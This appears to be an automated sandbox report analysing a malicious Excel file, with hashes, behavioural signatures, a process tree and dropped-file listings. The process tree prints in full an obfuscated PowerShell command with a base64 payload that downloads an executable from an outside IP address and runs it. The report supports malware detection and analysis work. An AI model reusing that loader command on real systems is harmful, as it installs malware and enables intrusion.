Analysis
-
max time kernel
139s -
max time network
140s -
platform
windows7_x64 -
resource
win7-20240903-en -
resource tags
arch:x64arch:x86image:win7-20240903-enlocale:en-usos:windows7-x64system -
submitted
13-11-2024 02:46
Static task
static1
Behavioral task
behavioral1
Sample
aa4a4d125c444cbe602ab60cba31083a31fd60e2c2ce08e55f84468751a82daf.xls
Resource
win7-20240903-en
Behavioral task
behavioral2
Sample
aa4a4d125c444cbe602ab60cba31083a31fd60e2c2ce08e55f84468751a82daf.xls
Resource
win10v2004-20241007-en
General
-
Target
aa4a4d125c444cbe602ab60cba31083a31fd60e2c2ce08e55f84468751a82daf.xls
-
Size
1.1MB
-
MD5
8f3c11affc3d0195c96e4d1e4478e29c
-
SHA1
daad41a948964394469ac56db60e102515fe938f
-
SHA256
aa4a4d125c444cbe602ab60cba31083a31fd60e2c2ce08e55f84468751a82daf
-
SHA512
194efa4322ad42523eb4a8bfca941388eb645dde024712cbef2bd106d88407ff6f67ad3e6ddfdc8cbe7e7ba98a3fc6928092920c62d2b326e1bbb3b9784d0fa2
-
SSDEEP
24576:Uq9PLiijE2Z5Z2am8VcYjgxPF84LJQodsJU1BnBsk7LRXA2r:UEPLiij7Z5ZK8VcYMpFjLJQodH1BXPR9
Malware Config
Signatures
-
Process spawned unexpected child process 1 IoCs
This typically indicates the parent process was compromised via an exploit or macro.
Processes:
mstsc.exedescription pid pid_target Process procid_target Parent C:\Program Files (x86)\Microsoft Office\Office14\EXCEL.EXE is not expected to spawn this process 2360 3048 mstsc.exe 29 -
Blocklisted process makes network request 3 IoCs
Processes:
mshta.exePOwersHeLl.ExEflow pid Process 12 2732 mshta.exe 13 2732 mshta.exe 15 2476 POwersHeLl.ExE -
Downloads MZ/PE file
-
Evasion via Device Credential Deployment 2 IoCs
Processes:
powershell.exePOwersHeLl.ExEpid Process 876 powershell.exe 2476 POwersHeLl.ExE -
Executes dropped EXE 1 IoCs
Processes:
wlanext.exepid Process 1976 wlanext.exe -
Loads dropped DLL 2 IoCs
Processes:
POwersHeLl.ExEmstsc.exepid Process 2476 POwersHeLl.ExE 2360 mstsc.exe -
AutoIT Executable 1 IoCs
AutoIT scripts compiled to PE executables.
Processes:
resource yara_rule behavioral1/files/0x0007000000018706-61.dat autoit_exe -
Drops file in System32 directory 2 IoCs
Processes:
POwersHeLl.ExEpowershell.exedescription ioc Process File opened for modification C:\Windows\SysWOW64\%ProgramData%\Microsoft\Windows\Start Menu\Programs\Accessories\Windows PowerShell\Windows PowerShell.lnk POwersHeLl.ExE File opened for modification C:\Windows\SysWOW64\%ProgramData%\Microsoft\Windows\Start Menu\Programs\Accessories\Windows PowerShell\Windows PowerShell.lnk powershell.exe -
Suspicious use of SetThreadContext 4 IoCs
Processes:
wlanext.exesvchost.exemstsc.exedescription pid Process procid_target PID 1976 set thread context of 2124 1976 wlanext.exe 39 PID 2124 set thread context of 3048 2124 svchost.exe 29 PID 2124 set thread context of 2360 2124 svchost.exe 40 PID 2360 set thread context of 3048 2360 mstsc.exe 29 -
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).
-
System Location Discovery: System Language Discovery 1 TTPs 8 IoCs
Attempt gather information about the system language of a victim in order to infer the geographical location of that host.
Processes:
POwersHeLl.ExEpowershell.execsc.execvtres.exewlanext.exemstsc.exeEXCEL.EXEmshta.exedescription ioc Process Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language POwersHeLl.ExE Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language powershell.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language csc.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language cvtres.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language wlanext.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language mstsc.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language EXCEL.EXE Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language mshta.exe -
Enumerates system info in registry 2 TTPs 1 IoCs
Processes:
EXCEL.EXEdescription ioc Process Key opened \REGISTRY\MACHINE\Hardware\Description\System\FloatingPointProcessor EXCEL.EXE -
Processes:
mshta.exemstsc.exedescription ioc Process Key created \REGISTRY\USER\S-1-5-21-3063565911-2056067323-3330884624-1000\Software\Microsoft\Internet Explorer\Main mshta.exe Key created \Registry\User\S-1-5-21-3063565911-2056067323-3330884624-1000\SOFTWARE\Microsoft\Internet Explorer\IntelliForms\Storage2 mstsc.exe -
Suspicious behavior: AddClipboardFormatListener 1 IoCs
Processes:
EXCEL.EXEpid Process 3048 EXCEL.EXE -
Suspicious behavior: EnumeratesProcesses 12 IoCs
Processes:
POwersHeLl.ExEpowershell.exesvchost.exemstsc.exepid Process 2476 POwersHeLl.ExE 876 powershell.exe 2476 POwersHeLl.ExE 2476 POwersHeLl.ExE 2124 svchost.exe 2124 svchost.exe 2124 svchost.exe 2124 svchost.exe 2360 mstsc.exe 2360 mstsc.exe 2360 mstsc.exe 2360 mstsc.exe -
Suspicious behavior: MapViewOfSection 6 IoCs
Processes:
wlanext.exesvchost.exeEXCEL.EXEmstsc.exepid Process 1976 wlanext.exe 2124 svchost.exe 3048 EXCEL.EXE 3048 EXCEL.EXE 2360 mstsc.exe 2360 mstsc.exe -
Suspicious use of AdjustPrivilegeToken 2 IoCs
Processes:
POwersHeLl.ExEpowershell.exedescription pid Process Token: SeDebugPrivilege 2476 POwersHeLl.ExE Token: SeDebugPrivilege 876 powershell.exe -
Suspicious use of SetWindowsHookEx 5 IoCs
Processes:
EXCEL.EXEpid Process 3048 EXCEL.EXE 3048 EXCEL.EXE 3048 EXCEL.EXE 3048 EXCEL.EXE 3048 EXCEL.EXE -
Suspicious use of WriteProcessMemory 29 IoCs
Processes:
mshta.exePOwersHeLl.ExEcsc.exewlanext.exeEXCEL.EXEdescription pid Process procid_target PID 2732 wrote to memory of 2476 2732 mshta.exe 32 PID 2732 wrote to memory of 2476 2732 mshta.exe 32 PID 2732 wrote to memory of 2476 2732 mshta.exe 32 PID 2732 wrote to memory of 2476 2732 mshta.exe 32 PID 2476 wrote to memory of 876 2476 POwersHeLl.ExE 34 PID 2476 wrote to memory of 876 2476 POwersHeLl.ExE 34 PID 2476 wrote to memory of 876 2476 POwersHeLl.ExE 34 PID 2476 wrote to memory of 876 2476 POwersHeLl.ExE 34 PID 2476 wrote to memory of 768 2476 POwersHeLl.ExE 35 PID 2476 wrote to memory of 768 2476 POwersHeLl.ExE 35 PID 2476 wrote to memory of 768 2476 POwersHeLl.ExE 35 PID 2476 wrote to memory of 768 2476 POwersHeLl.ExE 35 PID 768 wrote to memory of 1992 768 csc.exe 36 PID 768 wrote to memory of 1992 768 csc.exe 36 PID 768 wrote to memory of 1992 768 csc.exe 36 PID 768 wrote to memory of 1992 768 csc.exe 36 PID 2476 wrote to memory of 1976 2476 POwersHeLl.ExE 38 PID 2476 wrote to memory of 1976 2476 POwersHeLl.ExE 38 PID 2476 wrote to memory of 1976 2476 POwersHeLl.ExE 38 PID 2476 wrote to memory of 1976 2476 POwersHeLl.ExE 38 PID 1976 wrote to memory of 2124 1976 wlanext.exe 39 PID 1976 wrote to memory of 2124 1976 wlanext.exe 39 PID 1976 wrote to memory of 2124 1976 wlanext.exe 39 PID 1976 wrote to memory of 2124 1976 wlanext.exe 39 PID 1976 wrote to memory of 2124 1976 wlanext.exe 39 PID 3048 wrote to memory of 2360 3048 EXCEL.EXE 40 PID 3048 wrote to memory of 2360 3048 EXCEL.EXE 40 PID 3048 wrote to memory of 2360 3048 EXCEL.EXE 40 PID 3048 wrote to memory of 2360 3048 EXCEL.EXE 40
Processes
-
C:\Program Files (x86)\Microsoft Office\Office14\EXCEL.EXE"C:\Program Files (x86)\Microsoft Office\Office14\EXCEL.EXE" /dde C:\Users\Admin\AppData\Local\Temp\aa4a4d125c444cbe602ab60cba31083a31fd60e2c2ce08e55f84468751a82daf.xls1⤵
- System Location Discovery: System Language Discovery
- Enumerates system info in registry
- Suspicious behavior: AddClipboardFormatListener
- Suspicious behavior: MapViewOfSection
- Suspicious use of SetWindowsHookEx
- Suspicious use of WriteProcessMemory
PID:3048 -
C:\Windows\SysWOW64\mstsc.exe"C:\Windows\SysWOW64\mstsc.exe"2⤵
- Process spawned unexpected child process
- Loads dropped DLL
- Suspicious use of SetThreadContext
- System Location Discovery: System Language Discovery
- Modifies Internet Explorer settings
- Suspicious behavior: EnumeratesProcesses
- Suspicious behavior: MapViewOfSection
PID:2360
-
-
C:\Windows\SysWOW64\mshta.exeC:\Windows\SysWOW64\mshta.exe -Embedding1⤵
- Blocklisted process makes network request
- System Location Discovery: System Language Discovery
- Modifies Internet Explorer settings
- Suspicious use of WriteProcessMemory
PID:2732 -
C:\Windows\SysWOW64\wiNdoWSPoWeRSheLl\v1.0\POwersHeLl.ExE"C:\Windows\SysTEM32\wiNdoWSPoWeRSheLl\v1.0\POwersHeLl.ExE" "pOwErsHell -Ex ByPass -NoP -w 1 -C DEVicecREdEnTiAlDEplOYMeNt ; iex($(Iex('[sYStEM.tExt.EnCodINg]'+[ChaR]58+[CHAr]0X3a+'UTF8.getsTring([SYsTEm.CoNVErT]'+[ChAr]0x3a+[CHAR]58+'FroMBASe64strINg('+[ChaR]0X22+'JEMzV3NmSEMgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICA9ICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgQWRELVRZcGUgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAtTWVNYmVyZEVGSU5pVElvTiAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICdbRGxsSW1wb3J0KCJVUkxNb24uRGxsIiwgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBDaGFyU2V0ID0gQ2hhclNldC5Vbmljb2RlKV1wdWJsaWMgc3RhdGljIGV4dGVybiBJbnRQdHIgVVJMRG93bmxvYWRUb0ZpbGUoSW50UHRyICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgRnMsc3RyaW5nICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgQ1ByeSxzdHJpbmcgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBJcWloU2dPcyx1aW50ICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgc3l3UmhuUUdmS1IsSW50UHRyICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgV2JKYUdNKTsnICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgLW5hTWUgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAiV25XVCIgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAtbkFtZVNQQUNFICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgaiAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIC1QYXNzVGhydTsgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAkQzNXc2ZIQzo6VVJMRG93bmxvYWRUb0ZpbGUoMCwiaHR0cDovLzEwNy4xNzMuNC42MS8zNDUvd2xhbmV4dHMuZXhlIiwiJEVOdjpBUFBEQVRBXHdsYW5leHQuZXhlIiwwLDApO3NUQVJULXNsZUVwKDMpO3NUYXJUICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIiRFTnY6QVBQREFUQVx3bGFuZXh0LmV4ZSI='+[chaR]0X22+'))')))"2⤵
- Blocklisted process makes network request
- Evasion via Device Credential Deployment
- Loads dropped DLL
- Drops file in System32 directory
- System Location Discovery: System Language Discovery
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:2476 -
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -Ex ByPass -NoP -w 1 -C DEVicecREdEnTiAlDEplOYMeNt3⤵
- Evasion via Device Credential Deployment
- Drops file in System32 directory
- System Location Discovery: System Language Discovery
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:876
-
-
C:\Windows\Microsoft.NET\Framework\v2.0.50727\csc.exe"C:\Windows\Microsoft.NET\Framework\v2.0.50727\csc.exe" /noconfig /fullpaths @"C:\Users\Admin\AppData\Local\Temp\tnpx6mte.cmdline"3⤵
- System Location Discovery: System Language Discovery
- Suspicious use of WriteProcessMemory
PID:768 -
C:\Windows\Microsoft.NET\Framework\v2.0.50727\cvtres.exeC:\Windows\Microsoft.NET\Framework\v2.0.50727\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\Admin\AppData\Local\Temp\RESC16C.tmp" "c:\Users\Admin\AppData\Local\Temp\CSCC16B.tmp"4⤵
- System Location Discovery: System Language Discovery
PID:1992
-
-
-
C:\Users\Admin\AppData\Roaming\wlanext.exe"C:\Users\Admin\AppData\Roaming\wlanext.exe"3⤵
- Executes dropped EXE
- Suspicious use of SetThreadContext
- System Location Discovery: System Language Discovery
- Suspicious behavior: MapViewOfSection
- Suspicious use of WriteProcessMemory
PID:1976 -
C:\Windows\SysWOW64\svchost.exe"C:\Users\Admin\AppData\Roaming\wlanext.exe"4⤵
- Suspicious use of SetThreadContext
- Suspicious behavior: EnumeratesProcesses
- Suspicious behavior: MapViewOfSection
PID:2124
-
-
-
Network
MITRE ATT&CK Enterprise v15
Replay Monitor
Loading Replay Monitor...
Downloads
-
Filesize
717B
MD5822467b728b7a66b081c91795373789a
SHA1d8f2f02e1eef62485a9feffd59ce837511749865
SHA256af2343382b88335eea72251ad84949e244ff54b6995063e24459a7216e9576b9
SHA512bacea07d92c32078ca6a0161549b4e18edab745dd44947e5f181d28cc24468e07769d6835816cdfb944fd3d0099bde5e21b48f4966824c5c16c1801712303eb6
-
Filesize
504B
MD5fca2d4075e78fd8330d5590ee560451b
SHA1b7ab976b0f45facd4a29a6aded52515523cd756b
SHA2569f9f330b74a23eac5552db138565085b9a57c32dc746c3ad230659ad37ddc689
SHA512f0adf4b6d64229f3c8dee585a80a7e8e1614251318be226bbf5af21779bf7ffac0d9f9858525e5388f00b9547984dae737d022d0cce4ba4c66936383bf55f991
-
C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\103621DE9CD5414CC2538780B4B75751
Filesize192B
MD58cea8ad0055cfa7e2996bb974d07439d
SHA10f79068cf7f28aa67c12849457f6b73eb319125a
SHA256975a4049d9052d356d7e8b98a12d146bb9f006e76df36ba7dbe4d265078e191a
SHA51268dbc1e3cad1c472490000cbe5c9f0f5fb053ca0ed50fad15fc91144c5f4cddc2b8bf0df1db4802d13f45be366065de08b26784e3ff32bb1a5980be4db34f87a
-
C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\CB467543952BE6B5200B9CADEB942CD1
Filesize554B
MD5278f2c9dc15ca7c48785ffb7a522f3b6
SHA1826e17b66ae225807c37f1534623ee2120cf3666
SHA25667a45783638fa4692d0d52305b3e2d4dd64dfddce09b049d64c8942b9a561661
SHA5124c3f6e4f8d0c788b608fc73163c669e2b894ea9068fc01ba21187eeb924f2d203280250b5ca55d665c9e44a3806d952e3b375e7414a747423b40c484e5234ecb
-
C:\Users\Admin\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\K3VL8XEP\seethebestthingswithgreatthingsbestthingswithgreatentry[1].hta
Filesize8KB
MD503ebca3f0b4171e32b0689a3410e79ad
SHA11e7b517e45f1b0e503e796bb6dcc7a6252f35364
SHA2561d3307d98ef8b5e0743dc753388a3b8698a52783338bf8fe49042ad62ad98732
SHA512a7b84ce6572f3e820cffe438c771b5c3bdd140fca78edb7d6a7217bb7bf57950168d025f5c6e634e482a4a99576367ada72e3d9e26891ab03901136f9ed74270
-
Filesize
70KB
MD549aebf8cbd62d92ac215b2923fb1b9f5
SHA11723be06719828dda65ad804298d0431f6aff976
SHA256b33efcb95235b98b48508e019afa4b7655e80cf071defabd8b2123fc8b29307f
SHA512bf86116b015fb56709516d686e168e7c9c68365136231cc51d0b6542ae95323a71d2c7acec84aad7dcecc2e410843f6d82a0a6d51b9acfc721a9c84fdd877b5b
-
Filesize
1KB
MD5ceff02079ffeba9fe9071e2a8dc5c60b
SHA18ef32fde3068d74ff260594f4e81a9e722dd9c8a
SHA256f2701121bba43e22f733ad8d9c0bc503b547f21fc95d352ca10d0819f7a32d0d
SHA5128e0bcc1700b9ba4ec01d04baed103bb8c5a573b3aa2382eb4ef3ce0b194312314971542ec7399fe2a767da070ac0e3d8002f11c6bda0d3b7724c5d8823ee4f74
-
Filesize
283KB
MD55fc0e7bec89d9a4e021d88dd1cf731b2
SHA126ea02938cb1eb51a1ac601ab1b068a130cc3719
SHA256532d407f3bdbd28145b385a4e15c80117e07e89f2ba16f1f620fe20cf213783d
SHA5121c54091984fb41f43dbf7c7676184482ca853fb33e41780a323aec0ca21759e2a91af3bff30a947579811882d1c710a138e7e57dea2d9790e5092e68b768664f
-
Filesize
484KB
MD53bcbd3b08e4a8843fda34512623960a2
SHA1244d3df69bbc09a43d4af3de5165f50506b8d7af
SHA2567db638aa6b205aadba193dc7803a7e73eb07bbeeacbacad3a65978093e78673c
SHA512914f366aab61ed2c13a87ee07e6a4b7aeffe4689c28014fab786244127852a19b7c1ae58bd8dd11840415035290373922f39b628c2409f68569cbf0b8a57e639
-
Filesize
3KB
MD51a216f7b4404a7e76e9224ad3f4d0579
SHA197954f49e9a8c8b54c1542a8f916972443e5b389
SHA256e257a1620aa98b569bcdb75cedbf2552f3d0a3e49df71007dc2a64526d15bb02
SHA51245c7dc8ebd845f46931019b378a8a8333238adf77e73ad3c71be4843a11b6cdad56718d31adb08b6e1ac52f46966ab15c4664f281978238812a8a35fc3ff40a4
-
Filesize
7KB
MD57b95801062f5d47de9cc5e59dcc10462
SHA16d7e58750a67f796d6441a84538f32b0d481a95e
SHA2561108177b5dac0f3dbb5fef753d33ff281e4a8015184b8962005c2f67eb12f009
SHA512e6253dfef719f52fc44e88d2c26bccd168d1bc7aef5266cd7a39b9ccf67df83c7483f53b066fe1cf1715f4af70c9e51f9b3d76ed5b451854e891a02cf587375d
-
C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\d93f411851d7c929.customDestinations-ms
Filesize7KB
MD5c25ae41143a3dc8db0136cd00b75e178
SHA1c0c8d88e62eb1b3e759677512ed50a320df32479
SHA25673d82479177fd2cf7b7c493b7120035eeb3f17e3eba5973ee427194cd201c754
SHA5123d5e96b136faaab56f24f9fc216f30d418915169600e9a90ab934804f2f2ff8939e490f3098be3141fcde8b0ff151c6179c9ce7160b57f8e1c77e9b32d2ec8fe
-
Filesize
946KB
MD57423e3013a2ca93513e9f1024dfe1cc8
SHA1525281537f75c168ca4015df438bb83a7784931a
SHA2568e3951372f996dd248695a54af7ff1a5cde1059689aa43d953712e6c0744c0df
SHA512d5189a52b0cb9db2da33b7d8a61278e5e8edf0d1f075695dc5e99178e47b319658f8cf3e8339ee8bf24c548b3a38c01265250edf173f368dbea062ada78baea0
-
Filesize
652B
MD55c851f4b3a74dc8112c0363e7a4c058b
SHA19efc91ddaf92b054bc744fce8fa49abb8487d06e
SHA256c1f74a6fbb7152496a27ecb896ecc310c624f4672024766f3b7b6bac32957fab
SHA512c5f9f6313edf4ef0055a0dd39191a0a70c4f9f51f2b6a7667a4a30e759d65f31a8817492ee53863e93f9750386db9cc399fefc55e5a2a53be15cdd0691cf2e4d
-
Filesize
473B
MD54af98cbe7b888e1e92e1aa8a35732223
SHA175d54c91355c97fc9b1c3453efea5dccd817ed42
SHA256596b94a3cb934e9261ddf50733d26c0147c5cb57e1215cabed32fee719782f34
SHA5121127001fd6eb53db939188df14cdd466f44103d8386e51ffaeaaa56569e137367388097c37422fbe332f6b7ced9f4959058f1235f106efcc03e492e009705ff3
-
Filesize
309B
MD5cb25a753d2162468e70eb450ff86d8ed
SHA1994be0e177cc763e04068fffea58d20e30dd327f
SHA25652dafc3b411fc1f3f717745ef1c76029cae193d7fb6777f4c67cef223824fdd2
SHA512b396add7928624ee470ed5fd66197222a0192a732054bdac5b0690587e2272e209e3ee91c57b26649527b158940c4538d63c494d7a2457f8bf1508fc9d0216cb
-
Filesize
922KB
MD5dda1b03a5cd2ca37c96b7daf5e3a8ed7
SHA1c70e5f58e61980d39608f0795879bf012dbbbca2
SHA25679f86c1edbbc69652a03a0f5667b3985bcf1e19f16fa3b8c7934e5b97ab8586d
SHA512bf83648c9b5d6d65b2c8409d262a1b7421d2cb13d6c759ec5f352c2d1c5adff3ee2395250fbdfe3590f25fe96bf6b40c2d82a8e7eecaab03be2e6a398e83981f